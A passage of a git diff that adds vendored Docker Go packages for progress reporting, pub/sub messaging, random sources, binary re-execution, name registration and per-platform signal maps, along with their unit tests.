+func DiscardOutput() Output {
+	return discardOutput{}
+}
+
+// Update is a convenience function to write a progress update to the channel.
+func Update(out Output, id, action string) {
+	out.WriteProgress(Progress{ID: id, Action: action})
+}
+
+// Updatef is a convenience function to write a printf-formatted progress update
+// to the channel.
+func Updatef(out Output, id, format string, a ...interface{}) {
+	Update(out, id, fmt.Sprintf(format, a...))
+}
+
+// Message is a convenience function to write a progress message to the channel.
+func Message(out Output, id, message string) {
+	out.WriteProgress(Progress{ID: id, Message: message})
+}
+
+// Messagef is a convenience function to write a printf-formatted progress
+// message to the channel.
+func Messagef(out Output, id, format string, a ...interface{}) {
+	Message(out, id, fmt.Sprintf(format, a...))
+}
+
+// Aux sends auxiliary information over a progress interface, which will not be
+// formatted for the UI. This is used for things such as push signing.
+func Aux(out Output, a interface{}) {
+	out.WriteProgress(Progress{Aux: a})
+}
diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go
new file mode 100644
index 0000000000..6b3927eecf
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go
@@ -0,0 +1,66 @@
+package progress
+
+import (
+	"io"
+	"time"
+
+	"golang.org/x/time/rate"
+)
+
+// Reader is a Reader with progress bar.
+type Reader struct {
+	in          io.ReadCloser // Stream to read from
+	out         Output        // Where to send progress bar to
+	size        int64
+	current     int64
+	lastUpdate  int64
+	id          string
+	action      string
+	rateLimiter *rate.Limiter
+}
+
+// NewProgressReader creates a new ProgressReader.
+func NewProgressReader(in io.ReadCloser, out Output, size int64, id, action string) *Reader {
+	return &Reader{
+		in:          in,
+		out:         out,
+		size:        size,
+		id:          id,
+		action:      action,
+		rateLimiter: rate.NewLimiter(rate.Every(100*time.Millisecond), 1),
+	}
+}
+
+func (p *Reader) Read(buf []byte) (n int, err error) {
+	read, err := p.in.Read(buf)
+	p.current += int64(read)
+	updateEvery := int64(1024 * 512) //512kB
+	if p.size > 0 {
+		// Update progress for every 1% read if 1% < 512kB
+		if increment := int64(0.01 * float64(p.size)); increment < updateEvery {
+			updateEvery = increment
+		}
+	}
+	if p.current-p.lastUpdate > updateEvery || err != nil {
+		p.updateProgress(err != nil && read == 0)
+		p.lastUpdate = p.current
+	}
+
+	return read, err
+}
+
+// Close closes the progress reader and its underlying reader.
+func (p *Reader) Close() error {
+	if p.current < p.size {
+		// print a full progress bar when closing prematurely
+		p.current = p.size
+		p.updateProgress(false)
+	}
+	return p.in.Close()
+}
+
+func (p *Reader) updateProgress(last bool) {
+	if last || p.current == p.size || p.rateLimiter.Allow() {
+		p.out.WriteProgress(Progress{ID: p.id, Action: p.action, Current: p.current, Total: p.size, LastUpdate: last})
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
new file mode 100644
index 0000000000..b14d401561
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
@@ -0,0 +1,75 @@
+package progress
+
+import (
+	"bytes"
+	"io"
+	"io/ioutil"
+	"testing"
+)
+
+func TestOutputOnPrematureClose(t *testing.T) {
+	content := []byte("TESTING")
+	reader := ioutil.NopCloser(bytes.NewReader(content))
+	progressChan := make(chan Progress, 10)
+
+	pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read")
+
+	part := make([]byte, 4, 4)
+	_, err := io.ReadFull(pr, part)
+	if err != nil {
+		pr.Close()
+		t.Fatal(err)
+	}
+
+drainLoop:
+	for {
+		select {
+		case <-progressChan:
+		default:
+			break drainLoop
+		}
+	}
+
+	pr.Close()
+
+	select {
+	case <-progressChan:
+	default:
+		t.Fatalf("Expected some output when closing prematurely")
+	}
+}
+
+func TestCompleteSilently(t *testing.T) {
+	content := []byte("TESTING")
+	reader := ioutil.NopCloser(bytes.NewReader(content))
+	progressChan := make(chan Progress, 10)
+
+	pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read")
+
+	out, err := ioutil.ReadAll(pr)
+	if err != nil {
+		pr.Close()
+		t.Fatal(err)
+	}
+	if string(out) != "TESTING" {
+		pr.Close()
+		t.Fatalf("Unexpected output %q from reader", string(out))
+	}
+
+drainLoop:
+	for {
+		select {
+		case <-progressChan:
+		default:
+			break drainLoop
+		}
+	}
+
+	pr.Close()
+
+	select {
+	case <-progressChan:
+		t.Fatalf("Should have closed silently when read is complete")
+	default:
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go
new file mode 100644
index 0000000000..dd52b9082f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/promise/promise.go
@@ -0,0 +1,11 @@
+package promise
+
+// Go is a basic promise implementation: it wraps calls a function in a goroutine,
+// and returns a channel which will later return the function's return value.
+func Go(f func() error) chan error {
+	ch := make(chan error, 1)
+	go func() {
+		ch <- f()
+	}()
+	return ch
+}
diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go
new file mode 100644
index 0000000000..09364617e4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go
@@ -0,0 +1,111 @@
+package pubsub
+
+import (
+	"sync"
+	"time"
+)
+
+var wgPool = sync.Pool{New: func() interface{} { return new(sync.WaitGroup) }}
+
+// NewPublisher creates a new pub/sub publisher to broadcast messages.
+// The duration is used as the send timeout as to not block the publisher publishing
+// messages to other clients if one client is slow or unresponsive.
+// The buffer is used when creating new channels for subscribers.
+func NewPublisher(publishTimeout time.Duration, buffer int) *Publisher {
+	return &Publisher{
+		buffer:      buffer,
+		timeout:     publishTimeout,
+		subscribers: make(map[subscriber]topicFunc),
+	}
+}
+
+type subscriber chan interface{}
+type topicFunc func(v interface{}) bool
+
+// Publisher is basic pub/sub structure. Allows to send events and subscribe
+// to them. Can be safely used from multiple goroutines.
+type Publisher struct {
+	m           sync.RWMutex
+	buffer      int
+	timeout     time.Duration
+	subscribers map[subscriber]topicFunc
+}
+
+// Len returns the number of subscribers for the publisher
+func (p *Publisher) Len() int {
+	p.m.RLock()
+	i := len(p.subscribers)
+	p.m.RUnlock()
+	return i
+}
+
+// Subscribe adds a new subscriber to the publisher returning the channel.
+func (p *Publisher) Subscribe() chan interface{} {
+	return p.SubscribeTopic(nil)
+}
+
+// SubscribeTopic adds a new subscriber that filters messages sent by a topic.
+func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} {
+	ch := make(chan interface{}, p.buffer)
+	p.m.Lock()
+	p.subscribers[ch] = topic
+	p.m.Unlock()
+	return ch
+}
+
+// Evict removes the specified subscriber from receiving any more messages.
+func (p *Publisher) Evict(sub chan interface{}) {
+	p.m.Lock()
+	delete(p.subscribers, sub)
+	close(sub)
+	p.m.Unlock()
+}
+
+// Publish sends the data in v to all subscribers currently registered with the publisher.
+func (p *Publisher) Publish(v interface{}) {
+	p.m.RLock()
+	if len(p.subscribers) == 0 {
+		p.m.RUnlock()
+		return
+	}
+
+	wg := wgPool.Get().(*sync.WaitGroup)
+	for sub, topic := range p.subscribers {
+		wg.Add(1)
+		go p.sendTopic(sub, topic, v, wg)
+	}
+	wg.Wait()
+	wgPool.Put(wg)
+	p.m.RUnlock()
+}
+
+// Close closes the channels to all subscribers registered with the publisher.
+func (p *Publisher) Close() {
+	p.m.Lock()
+	for sub := range p.subscribers {
+		delete(p.subscribers, sub)
+		close(sub)
+	}
+	p.m.Unlock()
+}
+
+func (p *Publisher) sendTopic(sub subscriber, topic topicFunc, v interface{}, wg *sync.WaitGroup) {
+	defer wg.Done()
+	if topic != nil && !topic(v) {
+		return
+	}
+
+	// send under a select as to not block if the receiver is unavailable
+	if p.timeout > 0 {
+		select {
+		case sub <- v:
+		case <-time.After(p.timeout):
+		}
+		return
+	}
+
+	select {
+	case sub <- v:
+	default:
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
new file mode 100644
index 0000000000..d6b0a1d59a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
@@ -0,0 +1,142 @@
+package pubsub
+
+import (
+	"fmt"
+	"testing"
+	"time"
+)
+
+func TestSendToOneSub(t *testing.T) {
+	p := NewPublisher(100*time.Millisecond, 10)
+	c := p.Subscribe()
+
+	p.Publish("hi")
+
+	msg := <-c
+	if msg.(string) != "hi" {
+		t.Fatalf("expected message hi but received %v", msg)
+	}
+}
+
+func TestSendToMultipleSubs(t *testing.T) {
+	p := NewPublisher(100*time.Millisecond, 10)
+	subs := []chan interface{}{}
+	subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe())
+
+	p.Publish("hi")
+
+	for _, c := range subs {
+		msg := <-c
+		if msg.(string) != "hi" {
+			t.Fatalf("expected message hi but received %v", msg)
+		}
+	}
+}
+
+func TestEvictOneSub(t *testing.T) {
+	p := NewPublisher(100*time.Millisecond, 10)
+	s1 := p.Subscribe()
+	s2 := p.Subscribe()
+
+	p.Evict(s1)
+	p.Publish("hi")
+	if _, ok := <-s1; ok {
+		t.Fatal("expected s1 to not receive the published message")
+	}
+
+	msg := <-s2
+	if msg.(string) != "hi" {
+		t.Fatalf("expected message hi but received %v", msg)
+	}
+}
+
+func TestClosePublisher(t *testing.T) {
+	p := NewPublisher(100*time.Millisecond, 10)
+	subs := []chan interface{}{}
+	subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe())
+	p.Close()
+
+	for _, c := range subs {
+		if _, ok := <-c; ok {
+			t.Fatal("expected all subscriber channels to be closed")
+		}
+	}
+}
+
+const sampleText = "test"
+
+type testSubscriber struct {
+	dataCh chan interface{}
+	ch     chan error
+}
+
+func (s *testSubscriber) Wait() error {
+	return <-s.ch
+}
+
+func newTestSubscriber(p *Publisher) *testSubscriber {
+	ts := &testSubscriber{
+		dataCh: p.Subscribe(),
+		ch:     make(chan error),
+	}
+	go func() {
+		for data := range ts.dataCh {
+			s, ok := data.(string)
+			if !ok {
+				ts.ch <- fmt.Errorf("Unexpected type %T", data)
+				break
+			}
+			if s != sampleText {
+				ts.ch <- fmt.Errorf("Unexpected text %s", s)
+				break
+			}
+		}
+		close(ts.ch)
+	}()
+	return ts
+}
+
+// for testing with -race
+func TestPubSubRace(t *testing.T) {
+	p := NewPublisher(0, 1024)
+	var subs [](*testSubscriber)
+	for j := 0; j < 50; j++ {
+		subs = append(subs, newTestSubscriber(p))
+	}
+	for j := 0; j < 1000; j++ {
+		p.Publish(sampleText)
+	}
+	time.AfterFunc(1*time.Second, func() {
+		for _, s := range subs {
+			p.Evict(s.dataCh)
+		}
+	})
+	for _, s := range subs {
+		s.Wait()
+	}
+}
+
+func BenchmarkPubSub(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		p := NewPublisher(0, 1024)
+		var subs [](*testSubscriber)
+		for j := 0; j < 50; j++ {
+			subs = append(subs, newTestSubscriber(p))
+		}
+		b.StartTimer()
+		for j := 0; j < 1000; j++ {
+			p.Publish(sampleText)
+		}
+		time.AfterFunc(1*time.Second, func() {
+			for _, s := range subs {
+				p.Evict(s.dataCh)
+			}
+		})
+		for _, s := range subs {
+			if err := s.Wait(); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go
new file mode 100644
index 0000000000..70de4d1304
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/random/random.go
@@ -0,0 +1,71 @@
+package random
+
+import (
+	cryptorand "crypto/rand"
+	"io"
+	"math"
+	"math/big"
+	"math/rand"
+	"sync"
+	"time"
+)
+
+// Rand is a global *rand.Rand instance, which initialized with NewSource() source.
+var Rand = rand.New(NewSource())
+
+// Reader is a global, shared instance of a pseudorandom bytes generator.
+// It doesn't consume entropy.
+var Reader io.Reader = &reader{rnd: Rand}
+
+// copypaste from standard math/rand
+type lockedSource struct {
+	lk  sync.Mutex
+	src rand.Source
+}
+
+func (r *lockedSource) Int63() (n int64) {
+	r.lk.Lock()
+	n = r.src.Int63()
+	r.lk.Unlock()
+	return
+}
+
+func (r *lockedSource) Seed(seed int64) {
+	r.lk.Lock()
+	r.src.Seed(seed)
+	r.lk.Unlock()
+}
+
+// NewSource returns math/rand.Source safe for concurrent use and initialized
+// with current unix-nano timestamp
+func NewSource() rand.Source {
+	var seed int64
+	if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil {
+		// This should not happen, but worst-case fallback to time-based seed.
+		seed = time.Now().UnixNano()
+	} else {
+		seed = cryptoseed.Int64()
+	}
+	return &lockedSource{
+		src: rand.NewSource(seed),
+	}
+}
+
+type reader struct {
+	rnd *rand.Rand
+}
+
+func (r *reader) Read(b []byte) (int, error) {
+	i := 0
+	for {
+		val := r.rnd.Int63()
+		for val > 0 {
+			b[i] = byte(val)
+			i++
+			if i == len(b) {
+				return i, nil
+			}
+			val >>= 8
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go
new file mode 100644
index 0000000000..cf405f78cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/random/random_test.go
@@ -0,0 +1,22 @@
+package random
+
+import (
+	"math/rand"
+	"sync"
+	"testing"
+)
+
+// for go test -v -race
+func TestConcurrency(t *testing.T) {
+	rnd := rand.New(NewSource())
+	var wg sync.WaitGroup
+
+	for i := 0; i < 10; i++ {
+		wg.Add(1)
+		go func() {
+			rnd.Int63()
+			wg.Done()
+		}()
+	}
+	wg.Wait()
+}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md
new file mode 100644
index 0000000000..45592ce85a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/README.md
@@ -0,0 +1,5 @@
+## reexec
+
+The `reexec` package facilitates the busybox style reexec of the docker binary that we require because 
+of the forking limitations of using Go.  Handlers can be registered with a name and the argv 0 of 
+the exec of the binary will be used to find and execute custom init paths.
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go
new file mode 100644
index 0000000000..34ae2a9dcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go
@@ -0,0 +1,28 @@
+// +build linux
+
+package reexec
+
+import (
+	"os/exec"
+	"syscall"
+)
+
+// Self returns the path to the current process's binary.
+// Returns "/proc/self/exe".
+func Self() string {
+	return "/proc/self/exe"
+}
+
+// Command returns *exec.Cmd which has Path as current binary. Also it setting
+// SysProcAttr.Pdeathsig to SIGTERM.
+// This will use the in-memory version (/proc/self/exe) of the current binary,
+// it is thus safe to delete or replace the on-disk binary (os.Args[0]).
+func Command(args ...string) *exec.Cmd {
+	return &exec.Cmd{
+		Path: Self(),
+		Args: args,
+		SysProcAttr: &syscall.SysProcAttr{
+			Pdeathsig: syscall.SIGTERM,
+		},
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go
new file mode 100644
index 0000000000..778a720e3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go
@@ -0,0 +1,23 @@
+// +build freebsd solaris darwin
+
+package reexec
+
+import (
+	"os/exec"
+)
+
+// Self returns the path to the current process's binary.
+// Uses os.Args[0].
+func Self() string {
+	return naiveSelf()
+}
+
+// Command returns *exec.Cmd which has Path as current binary.
+// For example if current binary is "docker" at "/usr/bin/", then cmd.Path will
+// be set to "/usr/bin/docker".
+func Command(args ...string) *exec.Cmd {
+	return &exec.Cmd{
+		Path: Self(),
+		Args: args,
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
new file mode 100644
index 0000000000..76edd82427
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
@@ -0,0 +1,12 @@
+// +build !linux,!windows,!freebsd,!solaris,!darwin
+
+package reexec
+
+import (
+	"os/exec"
+)
+
+// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin.
+func Command(args ...string) *exec.Cmd {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go
new file mode 100644
index 0000000000..ca871c4227
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go
@@ -0,0 +1,23 @@
+// +build windows
+
+package reexec
+
+import (
+	"os/exec"
+)
+
+// Self returns the path to the current process's binary.
+// Uses os.Args[0].
+func Self() string {
+	return naiveSelf()
+}
+
+// Command returns *exec.Cmd which has Path as current binary.
+// For example if current binary is "docker.exe" at "C:\", then cmd.Path will
+// be set to "C:\docker.exe".
+func Command(args ...string) *exec.Cmd {
+	return &exec.Cmd{
+		Path: Self(),
+		Args: args,
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go
new file mode 100644
index 0000000000..c56671d919
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go
@@ -0,0 +1,47 @@
+package reexec
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"path/filepath"
+)
+
+var registeredInitializers = make(map[string]func())
+
+// Register adds an initialization func under the specified name
+func Register(name string, initializer func()) {
+	if _, exists := registeredInitializers[name]; exists {
+		panic(fmt.Sprintf("reexec func already registered under name %q", name))
+	}
+
+	registeredInitializers[name] = initializer
+}
+
+// Init is called as the first part of the exec process and returns true if an
+// initialization function was called.
+func Init() bool {
+	initializer, exists := registeredInitializers[os.Args[0]]
+	if exists {
+		initializer()
+
+		return true
+	}
+	return false
+}
+
+func naiveSelf() string {
+	name := os.Args[0]
+	if filepath.Base(name) == name {
+		if lp, err := exec.LookPath(name); err == nil {
+			return lp
+		}
+	}
+	// handle conversion of relative paths to absolute
+	if absName, err := filepath.Abs(name); err == nil {
+		return absName
+	}
+	// if we couldn't get absolute name, return original
+	// (NOTE: Go only errors on Abs() if os.Getwd fails)
+	return name
+}
diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go
new file mode 100644
index 0000000000..1e75ee995b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/registrar/registrar.go
@@ -0,0 +1,127 @@
+// Package registrar provides name registration. It reserves a name to a given key.
+package registrar
+
+import (
+	"errors"
+	"sync"
+)
+
+var (
+	// ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved
+	ErrNameReserved = errors.New("name is reserved")
+	// ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved
+	ErrNameNotReserved = errors.New("name is not reserved")
+	// ErrNoSuchKey is returned when trying to find the names for a key which is not known
+	ErrNoSuchKey = errors.New("provided key does not exist")
+)
+
+// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to
+// Names must be unique.
+// Registrar is safe for concurrent access.
+type Registrar struct {
+	idx   map[string][]string
+	names map[string]string
+	mu    sync.Mutex
+}
+
+// NewRegistrar creates a new Registrar with the an empty index
+func NewRegistrar() *Registrar {
+	return &Registrar{
+		idx:   make(map[string][]string),
+		names: make(map[string]string),
+	}
+}
+
+// Reserve registers a key to a name
+// Reserve is idempotent
+// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved`
+// A name reservation is globally unique
+func (r *Registrar) Reserve(name, key string) error {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+
+	if k, exists := r.names[name]; exists {
+		if k != key {
+			return ErrNameReserved
+		}
+		return nil
+	}
+
+	r.idx[key] = append(r.idx[key], name)
+	r.names[name] = key
+	return nil
+}
+
+// Release releases the reserved name
+// Once released, a name can be reserved again
+func (r *Registrar) Release(name string) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+
+	key, exists := r.names[name]
+	if !exists {
+		return
+	}
+
+	for i, n := range r.idx[key] {
+		if n != name {
+			continue
+		}
+		r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...)
+		break
+	}
+
+	delete(r.names, name)
+
+	if len(r.idx[key]) == 0 {
+		delete(r.idx, key)
+	}
+}
+
+// Delete removes all reservations for the passed in key.
+// All names reserved to this key are released.
+func (r *Registrar) Delete(key string) {
+	r.mu.Lock()
+	for _, name := range r.idx[key] {
+		delete(r.names, name)
+	}
+	delete(r.idx, key)
+	r.mu.Unlock()
+}
+
+// GetNames lists all the reserved names for the given key
+func (r *Registrar) GetNames(key string) ([]string, error) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+
+	names, exists := r.idx[key]
+	if !exists {
+		return nil, ErrNoSuchKey
+	}
+	return names, nil
+}
+
+// Get returns the key that the passed in name is reserved to
+func (r *Registrar) Get(name string) (string, error) {
+	r.mu.Lock()
+	key, exists := r.names[name]
+	r.mu.Unlock()
+
+	if !exists {
+		return "", ErrNameNotReserved
+	}
+	return key, nil
+}
+
+// GetAll returns all registered names
+func (r *Registrar) GetAll() map[string][]string {
+	out := make(map[string][]string)
+
+	r.mu.Lock()
+	// copy index into out
+	for id, names := range r.idx {
+		out[id] = names
+	}
+	r.mu.Unlock()
+	return out
+}
diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
new file mode 100644
index 0000000000..0c1ef312ae
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
@@ -0,0 +1,119 @@
+package registrar
+
+import (
+	"reflect"
+	"testing"
+)
+
+func TestReserve(t *testing.T) {
+	r := NewRegistrar()
+
+	obj := "test1"
+	if err := r.Reserve("test", obj); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := r.Reserve("test", obj); err != nil {
+		t.Fatal(err)
+	}
+
+	obj2 := "test2"
+	err := r.Reserve("test", obj2)
+	if err == nil {
+		t.Fatalf("expected error when reserving an already reserved name to another object")
+	}
+	if err != ErrNameReserved {
+		t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name")
+	}
+}
+
+func TestRelease(t *testing.T) {
+	r := NewRegistrar()
+	obj := "testing"
+
+	if err := r.Reserve("test", obj); err != nil {
+		t.Fatal(err)
+	}
+	r.Release("test")
+	r.Release("test") // Ensure there is no panic here
+
+	if err := r.Reserve("test", obj); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestGetNames(t *testing.T) {
+	r := NewRegistrar()
+	obj := "testing"
+	names := []string{"test1", "test2"}
+
+	for _, name := range names {
+		if err := r.Reserve(name, obj); err != nil {
+			t.Fatal(err)
+		}
+	}
+	r.Reserve("test3", "other")
+
+	names2, err := r.GetNames(obj)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !reflect.DeepEqual(names, names2) {
+		t.Fatalf("Exepected: %v, Got: %v", names, names2)
+	}
+}
+
+func TestDelete(t *testing.T) {
+	r := NewRegistrar()
+	obj := "testing"
+	names := []string{"test1", "test2"}
+	for _, name := range names {
+		if err := r.Reserve(name, obj); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	r.Reserve("test3", "other")
+	r.Delete(obj)
+
+	_, err := r.GetNames(obj)
+	if err == nil {
+		t.Fatal("expected error getting names for deleted key")
+	}
+
+	if err != ErrNoSuchKey {
+		t.Fatal("expected `ErrNoSuchKey`")
+	}
+}
+
+func TestGet(t *testing.T) {
+	r := NewRegistrar()
+	obj := "testing"
+	name := "test"
+
+	_, err := r.Get(name)
+	if err == nil {
+		t.Fatal("expected error when key does not exist")
+	}
+	if err != ErrNameNotReserved {
+		t.Fatal(err)
+	}
+
+	if err := r.Reserve(name, obj); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = r.Get(name); err != nil {
+		t.Fatal(err)
+	}
+
+	r.Delete(obj)
+	_, err = r.Get(name)
+	if err == nil {
+		t.Fatal("expected error when key does not exist")
+	}
+	if err != ErrNameNotReserved {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/README.md b/vendor/github.com/docker/docker/pkg/signal/README.md
new file mode 100644
index 0000000000..2b237a5942
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/README.md
@@ -0,0 +1 @@
+This package provides helper functions for dealing with signals across various operating systems
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go
new file mode 100644
index 0000000000..68bb77cf58
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal.go
@@ -0,0 +1,54 @@
+// Package signal provides helper functions for dealing with signals across
+// various operating systems.
+package signal
+
+import (
+	"fmt"
+	"os"
+	"os/signal"
+	"strconv"
+	"strings"
+	"syscall"
+)
+
+// CatchAll catches all signals and relays them to the specified channel.
+func CatchAll(sigc chan os.Signal) {
+	handledSigs := []os.Signal{}
+	for _, s := range SignalMap {
+		handledSigs = append(handledSigs, s)
+	}
+	signal.Notify(sigc, handledSigs...)
+}
+
+// StopCatch stops catching the signals and closes the specified channel.
+func StopCatch(sigc chan os.Signal) {
+	signal.Stop(sigc)
+	close(sigc)
+}
+
+// ParseSignal translates a string to a valid syscall signal.
+// It returns an error if the signal map doesn't include the given signal.
+func ParseSignal(rawSignal string) (syscall.Signal, error) {
+	s, err := strconv.Atoi(rawSignal)
+	if err == nil {
+		if s == 0 {
+			return -1, fmt.Errorf("Invalid signal: %s", rawSignal)
+		}
+		return syscall.Signal(s), nil
+	}
+	signal, ok := SignalMap[strings.TrimPrefix(strings.ToUpper(rawSignal), "SIG")]
+	if !ok {
+		return -1, fmt.Errorf("Invalid signal: %s", rawSignal)
+	}
+	return signal, nil
+}
+
+// ValidSignalForPlatform returns true if a signal is valid on the platform
+func ValidSignalForPlatform(sig syscall.Signal) bool {
+	for _, v := range SignalMap {
+		if v == sig {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
new file mode 100644
index 0000000000..946de87e94
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
@@ -0,0 +1,41 @@
+package signal
+
+import (
+	"syscall"
+)
+
+// SignalMap is a map of Darwin signals.
+var SignalMap = map[string]syscall.Signal{
+	"ABRT":   syscall.SIGABRT,
+	"ALRM":   syscall.SIGALRM,
+	"BUG":    syscall.SIGBUS,
+	"CHLD":   syscall.SIGCHLD,
+	"CONT":   syscall.SIGCONT,
+	"EMT":    syscall.SIGEMT,
+	"FPE":    syscall.SIGFPE,
+	"HUP":    syscall.SIGHUP,
+	"ILL":    syscall.SIGILL,
+	"INFO":   syscall.SIGINFO,
+	"INT":    syscall.SIGINT,
+	"IO":     syscall.SIGIO,
+	"IOT":    syscall.SIGIOT,
+	"KILL":   syscall.SIGKILL,
+	"PIPE":   syscall.SIGPIPE,
+	"PROF":   syscall.SIGPROF,
+	"QUIT":   syscall.SIGQUIT,
+	"SEGV":   syscall.SIGSEGV,
+	"STOP":   syscall.SIGSTOP,
+	"SYS":    syscall.SIGSYS,
+	"TERM":   syscall.SIGTERM,
+	"TRAP":   syscall.SIGTRAP,
+	"TSTP":   syscall.SIGTSTP,
+	"TTIN":   syscall.SIGTTIN,
+	"TTOU":   syscall.SIGTTOU,
+	"URG":    syscall.SIGURG,
+	"USR1":   syscall.SIGUSR1,
+	"USR2":   syscall.SIGUSR2,
+	"VTALRM": syscall.SIGVTALRM,
+	"WINCH":  syscall.SIGWINCH,
+	"XCPU":   syscall.SIGXCPU,
+	"XFSZ":   syscall.SIGXFSZ,
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
new file mode 100644
index 0000000000..6b9569bb75
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
@@ -0,0 +1,43 @@
+package signal
+
+import (
+	"syscall"
+)
+
+// SignalMap is a map of FreeBSD signals.
+var SignalMap = map[string]syscall.Signal{
+	"ABRT":   syscall.SIGABRT,
+	"ALRM":   syscall.SIGALRM,
+	"BUF":    syscall.SIGBUS,
+	"CHLD":   syscall.SIGCHLD,
+	"CONT":   syscall.SIGCONT,
+	"EMT":    syscall.SIGEMT,
+	"FPE":    syscall.SIGFPE,
+	"HUP":    syscall.SIGHUP,
+	"ILL":    syscall.SIGILL,
+	"INFO":   syscall.SIGINFO,
+	"INT":    syscall.SIGINT,
+	"IO":     syscall.SIGIO,
+	"IOT":    syscall.SIGIOT,
+	"KILL":   syscall.SIGKILL,
+	"LWP":    syscall.SIGLWP,
+	"PIPE":   syscall.SIGPIPE,
+	"PROF":   syscall.SIGPROF,
+	"QUIT":   syscall.SIGQUIT,
+	"SEGV":   syscall.SIGSEGV,
+	"STOP":   syscall.SIGSTOP,
+	"SYS":    syscall.SIGSYS,
+	"TERM":   syscall.SIGTERM,
+	"THR":    syscall.SIGTHR,
+	"TRAP":   syscall.SIGTRAP,
+	"TSTP":   syscall.SIGTSTP,
+	"TTIN":   syscall.SIGTTIN,
+	"TTOU":   syscall.SIGTTOU,
+	"URG":    syscall.SIGURG,
+	"USR1":   syscall.SIGUSR1,
+	"USR2":   syscall.SIGUSR2,
+	"VTALRM": syscall.SIGVTALRM,
+	"WINCH":  syscall.SIGWINCH,
+	"XCPU":   syscall.SIGXCPU,
+	"XFSZ":   syscall.SIGXFSZ,
+}
